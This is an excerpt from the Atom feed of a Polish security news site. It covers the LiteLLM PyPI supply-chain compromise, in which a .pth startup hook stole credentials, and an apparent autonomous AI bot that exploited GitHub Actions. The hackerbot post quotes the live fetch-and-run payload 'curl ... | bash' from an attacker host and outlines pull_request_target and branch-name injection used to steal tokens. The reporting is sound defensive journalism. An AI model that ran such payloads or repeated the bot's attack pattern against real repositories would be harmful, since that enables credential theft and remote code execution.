                        </ul></div><div><p><b style="color:#f00">Kraków</b>: <strong>22-23 czerwca 2026</strong>r. — zostało <strong>7 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 17 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gqo7fr">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 10 kwietnia)<br>
                        2744 PLN netto (od 11 kwietnia)
                        </ul></div><div><p><b style="color:#f00">Warszawa</b>: <strong>02-03 lipca 2026</strong>r. — zostało <strong>8 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 19 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gqobbl">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 10 kwietnia)<br>
                        2744 PLN netto (od 11 kwietnia)
                        </ul></div></div>
<p><em>Podzielcie się tym info z kolegami i koleżankami z zespołów. Kto pierwszy w biurze wpisał w nocy lub nad ranem npm update, ten potrzebuje pomocy. Sprawdźcie też czy jakieś automatyzacje nie budowały/aktualizowały Wam przez noc softu/środowiska w oparciu o axiosa. Wygląda na to, że nocne kodowanie to jednak nie taki zen&#8230; </em></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/#comments" rel="replies" thr:count="11" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/feed/atom/" rel="replies" thr:count="11" type="application/atom+xml"/>
			<thr:total>11</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Jak Nie Dać Się Zhackować? Czyli nasz wykład dla każdego znowu w Twoim mieście :)]]></title>
		<link href="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26972</id>
		<updated>2026-03-30T08:39:33Z</updated>
		<published>2026-03-30T08:39:33Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0047-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Każdy, kto korzysta z komputera, smartfona i internetu powinien wiedzieć jak robić to bezpiecznie. Od lat, tego jak “nie dać się zhackować” uczymy nie tylko pracowników największych polskich firm na szkoleniach zamkniętych odbywających się w ich siedzibach, ale także każdego kto chce — wystarczy wpaść na nasz 3 godzinny, pełen praktycznych porad i widowiskowych pokazów wykład. Właśnie ruszamy w [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/"><![CDATA[<p>Każdy, kto korzysta z komputera, smartfona i internetu powinien wiedzieć jak robić to bezpiecznie. Od lat, tego jak “nie dać się zhackować” uczymy nie tylko pracowników największych polskich firm na <a href="https://niebezpiecznik.pl/post/zapros-niebezpiecznika-do-twojej-firmy-na-goscinny-wyklad-z-cyberbezpieczenstwa/?" target="_blank">szkoleniach zamkniętych odbywających się w ich siedzibach</a>, ale także <strong>każdego kto chce</strong> — wystarczy wpaść na nasz 3 godzinny, pełen praktycznych porad i widowiskowych pokazów <a href="https://niebezpiecznik.pl/wyklad" target="_blank">wykład</a>. Właśnie ruszamy w Polskę z jego 6, ulepszoną edycją &#8212; tym razem odwiedzimy następujące miasta (start o <strong>17:30</strong>):<span id="more-26972"></span></p>
<ul>
		<!-- li><a href="https://nbzp.cz/jnsz-kra2510" target="_blank">KRAKOW <small>(weekend)</small> 4 października -- zapisz się tutaj!</a></li-->
		<li><a href="https://nbzp.cz/jnsz-kra2604" target="_blank">KRAKÓW, 9 kwietnia -- zapisz się tutaj!</a></li>
		<li><a href="https://nbzp.cz/jnsz-waw2604" target="_blank">WARSZAWA, 16 kwietnia -- zapisz się tutaj!</a></li>      
		<li><a href="https://nbzp.cz/jnsz-wro2606" target="_blank">WROCŁAW, 11 czerwca -- zapisz się tutaj!</a></li>
                <li><a href="https://nbzp.cz/jnsz-poz2610" target="_blank">POZNAŃ, 8 października -- zapisz się tutaj!</a></li>
                <li><a href="https://nbzp.cz/jnsz-lod2610" target="_blank">ŁÓDŹ, 22 października -- zapisz się tutaj!</a></li>
                <li><a href="https://nbzp.cz/jnsz-gda2611" target="_blank">GDAŃSK, 19 listopada -- zapisz się tutaj!</a></li>
</ul>
<div class="info">Jesteś z innego miasta? Nic nie szkodzi, tam pewnie też będziemy! Zostaw nam e-maila w polu poniżej, a powiadomimy Cię o kolejnych terminach: </p>
<form action="https://info.niebezpiecznik.pl/subscribe" method="POST" accept-charset="utf-8" target="_blank" style="margin-top:10px">
<label for="email">E-mail: </label><input type="email" name="email" id="email" size="30" style="margin-bottom:10px"/><br />
<label for="City">Miasto: </label><input type="text" name="City" id="City" style="margin-bottom:10px"/><br />
<input type="submit" name="submit" id="submit" value="Informuj mnie!"/></p>
<div style="display:none"><input type="hidden" name="list" value="my7633jgS8rm9n4vQEyWYBeQ"/> <input type="hidden" name="subform" value="yes"/><label for="hp">HP</label><br /><input type="text" name="hp" id="hp"/></div>
</form>
</div>
<h3>Dlaczego warto przyjść na nasz wykład?</h3>
<p>Poniżej 4 konkretne powody:</p>
<ul>
<strong><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Prosty język.</strong> Wykład bez problemu zrozumieją <strong>osoby nietechniczne</strong> &#8212; prowadzimy go w przystępny dla każdego sposób. Dlatego zapraszamy Was z <strong>rodzicami, dziadkami i znajomymi spoza branży IT</strong>.</p>
<p><strong><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Praktyczne i proste do wdrożenia rady.</strong> Pokażemy Ci jak co zrobić, aby ochronić swoje <strong>pieniądze, dane i prywatność</strong> przed cyberatakami. Nauczymy jak <strong>zabezpieczyć swój komputer i smartfon</strong> &#8212; co włączyć, co wyłączyć, jakie darmowe aplikacje wart doinstalować.</p>
<p><strong><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Demonstracje ataków na żywo</strong>. W trakcie wykładu pokazujemy na publiczności niektóre z ataków. To robi wrażenie i pomaga lepiej zrozumieć jak powinna wyglądać poprawna reakcja.    </p>
<p><strong><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Gwarancja jakości.</strong> Wykład widziało już <strong>kilkaset tysięcy Polaków</strong>. Aktualna średnia ocena to <strong>9,48/10</strong>.</ul>
<p>Jeśli Cię przekonaliśmy, to:</p>
<p><a href="https://bilety.niebezpiecznik.pl"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png" alt="" width="350" height="85" class="aligncenter size-medium wp-image-16113" srcset="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-768x187.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-600x146.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie.png 1084w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<p>Poniżej kilka opinii uczestników ostatnich edycji tego wykładu:</p>
<blockquote><p>Fantastyczny wykład. 3 godziny to nie tak mało jak na jedno podejście, a nawet nie wiem kiedy minęły.</p></blockquote>
<blockquote><p>Wykład oceniam wysoko ponieważ, pomimo dosyć dużej wiedzy na ten tamat (interesuje się bezpieczeństwem, czytam niebezpiecznika od dłuższego czasu a od niedawna pracuje w dziale application security) i pomimo tego że się dużo nie dowiedziałem nowego, to naprawdę fajnie spędziłem czas :). Dostałem też, dodatkowej motywacji, aby jeszcze więcej edukować rodzinę i moich znajomych. Dzięki!</p></blockquote>
<blockquote><p>Przydatne były informacje które uświadomiły mi, jak bardzo ważne jest, żeby chronić swoje dane osobowe. Nie zdawałam sobie sprawy jak łatwo można je pozyskać. BARDZO podobał mi się sposób mówienia, lekkość językowa. Łatwa, i zrozumiała nawet dla osoby która nie zna się na tych informatycznych rzeczach :)</p></blockquote>
<blockquote><p>Przed wykładem wydawało mi się, że jestem w zasadzie bezpieczny, że nie tak łatwo kogoś &#8220;zhakować&#8221;. Po wykładzie zrozumiałem, że się myliłem. Jeśli ktoś jest odpowiednio zdeterminowany, posiada wiedzę i cierpliwość, to może to zrobić. Warto mu więc to utrudniać w każdy możliwy sposób.</p></blockquote>
<div id="attachment_19289" style="width: 610px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104.jpg"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-19289" src="https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104-600x400.jpg" alt="Uczestnicy poprzedniego wykładu we Wrocławiu" width="600" height="400" class="size-large wp-image-19289" srcset="https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104-600x400.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104-350x234.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104-768x513.jpg 768w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a><p id="caption-attachment-19289" class="wp-caption-text">Uczestnicy poprzedniego wykładu we Wrocławiu podczas jednego z eksperymentów :)</p></div>
<p><a href="https://bilety.niebezpiecznik.pl"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png" alt="" width="350" height="85" class="aligncenter size-medium wp-image-16113" srcset="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-768x187.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-600x146.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie.png 1084w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<h3>Tematyka wykładu &#8220;Jak nie dać się zhackować?&#8221;</h3>
<p>W ramach trwającego łącznie 3 godziny wykładu (z 15 minutową przerwą w środku) pokażemy Ci:</p>
<ul>
<li>Jak poprawnie <strong>zabezpieczyć komputer i smartfona</strong>, aby nie zostały one zhackowane przez cyberprzestępców</li>
<li>Jak <strong>nie paść ofiarą aktualnych oszustw internetowych, scamów i przekrętów</strong></li>
<p> </p>
<li>Jak najlepiej ochronić swoje pieniądze i jak bezpiecznie robić <strong>zakupy w internecie </strong></li>
<li>Jak <strong>zabezpieczyć swoje dane i komunikację</strong>, aby nie zostały one przez nikogo przechwycone</li>
<li>Jak <strong>chronić swoją prywatność</strong> w trakcie korzystania z e-maila i serwisów społecznościowych</li>
<li>Jak bezpiecznie <strong>korzystać z bankowości internetowej</strong></li>
</ul>
<p>Powyższe zagadnienia zilustrujemy prawdziwymi przykładami ataków, jakie w ostatnich miesiącach dotknęły Polaków, a dodatkowo sami, <strong class="update">na żywo</strong> pokażemy jak atakują cyberprzestępcy.</p>
<ul>
<li>Podszyjemy się pod Pana prezydenta</li>
<li>Wykradniemy dane z telefonu komórkowego</li>
<li>Pokażemy jak szybko łamane są hasła Polaków</li>
<li>Zainfekujemy laptopa ofiary i będziemy ją podglądali przez wbudowaną w laptopa kamerkę</li>
<li>Przejmiemy kontrolę nad komputerem przy pomocy złośliwego pendrive&#8217;a albo ładowarki do papierosa elektronicznego</li>
</ul>
<p>Wierzcie nam, że w trakcie tych pokazów szczęka opadnie Wam nie raz&#8230; Gwarantujemy, że nikt, kto weźmie udział w tym wykładzie, już nigdy nie będzie tym samym człowiekiem  :)</p>
<p><iframe loading="lazy" width="560" height="315" src="https://www.youtube.com/embed/gn-Qit9Qdxg?si=o8WOe7Ul3bLJ2RMM" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<div class="info">Bilet na wykład możesz także kupić dla kogoś: <strong>Mamy, Taty, Babci, Syna, Znajomego</strong>. To idealny i praktyczny prezent &#8220;na święta&#8221;. Cena biletu to zdecydowanie mniejszy wydatek niż koszt jak musiałbyś ponieść, żeby posprzątać po ewentualnym ataku na bliską Ci osobę. Warto zadbać o swoich bliskich :)</div>
<p><a href="https://bilety.niebezpiecznik.pl"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png" alt="" width="350" height="85" class="aligncenter size-medium wp-image-16113" srcset="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-768x187.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-600x146.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie.png 1084w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/#comments" rel="replies" thr:count="3" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/feed/atom/" rel="replies" thr:count="3" type="application/atom+xml"/>
			<thr:total>3</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Ktoś zatruł popularną pythonową paczkę z 97 milionami pobrań&#8230;]]></title>
		<link href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26965</id>
		<updated>2026-03-25T11:16:29Z</updated>
		<published>2026-03-25T11:15:52Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="AI"/><category scheme="https://niebezpiecznik.pl" term="Hacked!"/><category scheme="https://niebezpiecznik.pl" term="LiteLLM"/><category scheme="https://niebezpiecznik.pl" term="programowanie"/><category scheme="https://niebezpiecznik.pl" term="PyPI"/><category scheme="https://niebezpiecznik.pl" term="python"/><category scheme="https://niebezpiecznik.pl" term="supply-chain"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hack-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Wczoraj, 24 marca, na oficjalnym repozytorium PyPI pojawiła się złośliwa wersja szalenie popularnej biblioteki LiteLLM (wersje 1.82.7 oraz 1.82.8). Czym jest LiteLLM? To opensource&#8217;owa &#8220;bramka&#8221;, która ułatwia programistom łączenie się z wieloma modelami językowymi (LLM) za pomocą jednego interfejsu API. To nie jest niszowy projekt, paczka ma na liczniku ponad 97 milionów pobrań. Wystarczyło zainstalować. [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/"><![CDATA[<p>Wczoraj, 24 marca, na oficjalnym repozytorium PyPI <a href="https://github.com/BerriAI/litellm/issues/24512" target="_blank">pojawiła się</a> złośliwa wersja szalenie popularnej biblioteki LiteLLM (wersje 1.82.7 oraz 1.82.8). Czym jest LiteLLM? To opensource&#8217;owa &#8220;bramka&#8221;, która ułatwia programistom łączenie się z wieloma modelami językowymi (LLM) za pomocą jednego interfejsu API. To nie jest niszowy projekt, paczka ma na liczniku ponad 97 milionów pobrań.<span id="more-26965"></span></p>
<p><H3>Wystarczyło zainstalować. Nie trzeba było nawet uruchamiać!</H3>Atakujący wykorzystali mechanizm ukrywania kodu w plikach z rozszerzeniem &#8220;<span class="code">.pth</span>&#8221; (tzw. Python Startup Hooks). Wrzucony przez nich do zatrutej paczki plik &#8220;<span class="code">litellm_init.pth</span>&#8221; był <strong>automatycznie wykonywany przy każdym uruchomieniu interpretera Pythona</strong>.</p>
<p>To oznacza, że programiści-ofiary nie musieli wcale pisać &#8220;<span class="code">import litellm</span>&#8221; w swoim kodzie. Wystarczyło, że zainstalowali paczkę (np. poprzez pobranie innego projektu, który używał LiteLLM jako zależności), a ukryty złośliwy skrypt uruchamiał się w tle przy każdym wywołaniu Pythona. Złośliwy kod wykradał z systemu: </p>
<ul>
<li>Klucze SSH, zmienne środowiskowe (a więc i klucze API), i pliki z konfiguracją Dockera.</li>
<li>Dane uwierzytelniające do chmur AWS, GCP, Azure oraz całe konfiguracje klastrów Kubernetes.</li>
<li>Klucze prywatne TLS, hasła do baz danych (PostgreSQL, MySQL, Redis) i pliki portfeli kryptowalutowych.</li>
<li>Historia powłoki (bash_history, zsh_history), gdzie często lądują hasła wpisywane &#8220;z palca&#8221;.</li>
</ul>
<p>Wszystkie te dane są pakowane do archiwum <span class="code">tpcp.tar.gz</span>, szyfrowane i wysyłane na serwer kontrolowany przez napastników: &#8220;<span class="code">models.litellm[.]cloud</span>&#8220;. Wiecie więc już czego szukać w logach&#8230; Szacuje się, że ofiarą tego ataku mogło paść nawet 500 000 urządzeń. Ale mogło być gorzej&#8230;</p>
<p><H3>Wpadka hakera zmniejszyła katastrofę</H3>Co ciekawe, atakujący popełnili głupi błąd. Jak <a href="https://www.google.com/search?q=https://www.bleepingcomputer.com/news/security/popular-litellm-pypi-package-backdoored-to-steal-credentials-auth-tokens/" target="_blank">informuje</a> Callum McMahon, wstrzyknięty kod zachował się u niego jak &#8220;fork bomba&#8221;. Złośliwy skrypt uruchamiał w tle kolejny proces Pythona, co powodowało, że ten nowy proces znowu czytał zatruty plik &#8220;.pth&#8221;, odpalając kolejnego Pythona i tak w nieskończoność. U niektórych programistów używających środowisk takich jak Cursor powodowało to natychmiastowe zużycie pamięci RAM do maksimum i zwieszkę kompa. Dzięki temu, że kod hakerów &#8220;wywalał&#8221; sprzęt, atak szybko zauważono, a <strong>paczkę usunięto z PyPI po niespełna 3 godzinach</strong>. Ale ponoć nie u wszystkich kod się zapętlał&#8230;</p>
<h3>Kto stoi za atakiem i jak tego dokonał?</h3>
<p>A teraz najlepsze. Za atak odpowiada grupa TeamPCP, która dostała się do infrastruktury LiteLLM poprzez wcześniejsze zhackowanie &#8230;<strong>skanera podatności Trivy</strong>, którego używano w procesie CI/CD (automatyzacji budowania i testowania kodu). </p>
<p>To klasyczny, wręcz podręcznikowy <strong>atak na łańcuch dostaw</strong> (ang. supply-chain attack) &#8212; co więcej o tym jak łatwo było wstrzyknąć coś w kod Trivy pisaliśmy w poprzednim artykule &#8212; <a href="https://niebezpiecznik.pl/post/bot-ai-przez-tydzien-hackowal-projekty-na-githubie-i-zhackowal/" target="_blank">zrobił to bot AI, wysyłając im Pull Requesta na GitHubie</a>&#8230;</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-350x203.jpg" alt="" width="350" height="203" class="aligncenter size-medium wp-image-26968" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-350x203.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-600x348.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-768x446.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-1536x892.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1.jpg 1750w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<p><H3>Co robić, jak żyć?</H3>Jeśli używasz Pythona, to:</p>
<blockquote><p>natychmiast sprawdź, czy w Twoim systemie lub kontenerach nie zainstalowała się wersja 1.82.7 lub 1.82.8 pakietu LiteLLM (<span class="code">pip show litellm</span>). Szukaj też pliku &#8220;litellm_init.pth&#8221; w katalogach &#8220;site-packages&#8221; &#8212; a jak go tam znajdziesz, to usuń.</p></blockquote>
<p>Jeśli go znajdziesz &#8212; współczujemy. Musisz założyć, że WSZYSTKIE hasła, klucze API i tokeny, które znajdowały się na tej maszynie (w tym te w plikach .env), są w rękach włamywaczy. Należy je natychmiast ubić/zrotować.</p>
<div class="info">
<a href="https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic-208x250.jpg" alt="" width="208" height="250" class="aligncenter size-medium wp-image-22047" srcset="https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic-208x250.jpg 208w, https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic-500x600.jpg 500w, https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic-768x922.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic.jpg 1122w" sizes="auto, (max-width: 208px) 100vw, 208px" /></a><br />
Chcesz wiedzieć jak bezpiecznie tworzyć kod aplikacji (nie tylko webowych)? To zapraszamy Cię na 2 dniowe, silnie praktyczne, niebezpiecznikowe szkolenie dla programistów &#8220;Atakowanie i Ochrona Webaplikacji&#8221;. Pokazujemy na nim najpopularniejsze błędy, jakie widzimy na testowanych przez nasz zespół bezpieczeństwa aplikacjach i uczymy wszystkiego, na co trzeba zwrócić uwagę podczas projektowania, budowy, testowania i deployowania kodu na produkcję. Najbliższe terminy znajdziesz poniżej (podaj podczas rejestracji w uwagach kod LITELLM, to zapiszemy Cię ze zniżką):</p>
<div><p><b style="color:#f00">Poznań</b>: <strong>20-21 kwietnia 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 4 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 02 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gzvg7v">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 3 kwietnia)<br>
                        2744 PLN netto (od 4 kwietnia)
                        </ul></div><div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>11-12 maja 2026</strong>r. — zostało <strong>6 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 02 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1hyq9f5">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 3 kwietnia)<br>
                        2744 PLN netto (od 4 kwietnia)
                        </ul></div><div><p><b style="color:#f00">Kraków</b>: <strong>22-23 czerwca 2026</strong>r. — zostało <strong>7 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 17 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gqo7fr">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 10 kwietnia)<br>
                        2744 PLN netto (od 11 kwietnia)
                        </ul></div><div><p><b style="color:#f00">Warszawa</b>: <strong>02-03 lipca 2026</strong>r. — zostało <strong>8 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 19 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gqobbl">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 10 kwietnia)<br>
                        2744 PLN netto (od 11 kwietnia)
                        </ul></div></div>
<p>PS. Badamy zainteresowanie webinarem na temat szeroko rozumianego AI i bezpieczeństwa (zarówno od strony użytkownika jak i developera). Zainteresowany? To zostaw nam maila w polu poniżej &#8212; jak cykl wystartuje, wyślemy Ci powiadomienie:</p>
<blockquote><p>
<script src='https://www.google.com/recaptcha/api.js'></script></p>
<form action="https://info.niebezpiecznik.pl/subscribe" method="POST" accept-charset="utf-8" style="margin-left:auto; margin-right:auto; width: 300px">
<label for="email" style="color:gray">Wpisz adres e-mail:</label><br />
<input type="email" name="email" id="email" size="35"/></p>
<p><label for="email" style="color:gray">Rozwiąż Captcha:</label></p>
<p class="g-recaptcha" data-sitekey="6LeoxuQUAAAAAA5HroywxIlzmrv1K2Ciq0BZKBZb">
<div style="display:none;">
<label for="hp">HP</label><input type="text" name="hp" id="hp"/></div>
<p><input type="hidden" name="list" value="T2Vqs9qFpXQZfhm7VWOOcQ"/><input type="hidden" name="subform" value="yes"/><input type="submit" name="submit" id="submit" value=" Poinformuj mnie o starcie! "/><br />
</form>
<p><small style="color:gray">Bez obaw, podanych e-maili nikomu nie przekazujemy i wykorzystamy je wyłącznie do przypominania Ci o naszych wydarzeniach. Jeśli lubisz czytać o RODO, kliknij <a href="https://niebezpiecznik.pl/regulamin-sklep/#rodo">tutaj</a>.</small>
</p></blockquote>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/#comments" rel="replies" thr:count="8" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/feed/atom/" rel="replies" thr:count="8" type="application/atom+xml"/>
			<thr:total>8</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Bot AI przez tydzień hackował projekty na GitHubie. I zhackował]]></title>
		<link href="https://niebezpiecznik.pl/post/bot-ai-przez-tydzien-hackowal-projekty-na-githubie-i-zhackowal/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26953</id>
		<updated>2026-03-25T10:02:49Z</updated>
		<published>2026-03-25T09:46:17Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="AI"/><category scheme="https://niebezpiecznik.pl" term="Claude"/><category scheme="https://niebezpiecznik.pl" term="Hackerbot-claw"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/bot-ai-przez-tydzien-hackowal-projekty-na-githubie-i-zhackowal/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw-github-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Sztuczna inteligencja nie tylko pisze kod. Zaczęła go również skutecznie atakować. Na przełomie lutego i marca autonomiczny bot o nazwie &#8220;hackerbot-claw&#8221; wziął sobie na celownik największe repozytoria na GitHubie. Oprogramowanie napędzane przez model Claude-Opus-4.5, samodzielnie skanowało publiczne projekty, wykrywało luki i skutecznie wyexploitowało (RCE) infrastruktury 4 firm, w tym Microsoftu. Jak wygląda hacking na autopilocie? [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/bot-ai-przez-tydzien-hackowal-projekty-na-githubie-i-zhackowal/"><![CDATA[<p>Sztuczna inteligencja nie tylko pisze kod. Zaczęła go również skutecznie atakować. Na przełomie lutego i marca autonomiczny bot o nazwie &#8220;hackerbot-claw&#8221; wziął sobie na celownik największe repozytoria na GitHubie. Oprogramowanie napędzane przez model Claude-Opus-4.5, samodzielnie skanowało publiczne projekty, wykrywało luki i skutecznie wyexploitowało (RCE) infrastruktury 4 firm, w tym Microsoftu.<span id="more-26953"></span></p>
<h3>Jak wygląda hacking na autopilocie?</h3>
<p>Jak <a href="https://www.stepsecurity.io/blog/hackerbot-claw-github-actions-exploitation)" target="_blank">opisują</a> sprawę badacze ze StepSecurity, hackerbot-claw na celownik wziął GitHub Actions &#8212; czyli popularne mechanizmy CI/CD (systemy automatyzacji budowania, testowania i wdrażania kodu) w tych projektach:</p>
<p><code>microsoft/ai-discovery-agent<br />
&#x200d;DataDog/datadog-iac-scanner<br />
&#x200d;avelino/awesome-go (140k+ stars)<br />
ambient-code/platform<br />
project-akri/akri (a CNCF project)<br />
aquasecurity/trivy (full repository compromise)<br />
RustPython/RustPython (20k+ stars)</code></p>
<p>Bot zawsze wstrzykiwał ten sam payload:</p>
<p><code>curl -sSfL hackmoltrepeat.com/molt | bash </code></p>
<p>Ale 5 różnymi wektorami ataku&#8230; Najciekawszym z nich był tzw. &#8220;<strong>Pwn Request</strong>&#8220;. Bot wykorzystał workflow typu &#8220;<span class="code">pull_request_target</span>&#8220;, które domyślnie posiada dostęp do sekretów docelowego repozytorium. Tworząc PR, bot wstrzykiwał złośliwy kod (np. do pliku konfiguracyjnego lub nawet w samą nazwę nowej gałęzi), a serwery budujące bezmyślnie go wykonały. W efekcie wykradał &#8220;<span class="code">GITHUB_TOKEN</span>&#8221; z uprawnieniami do zapisu.</p>
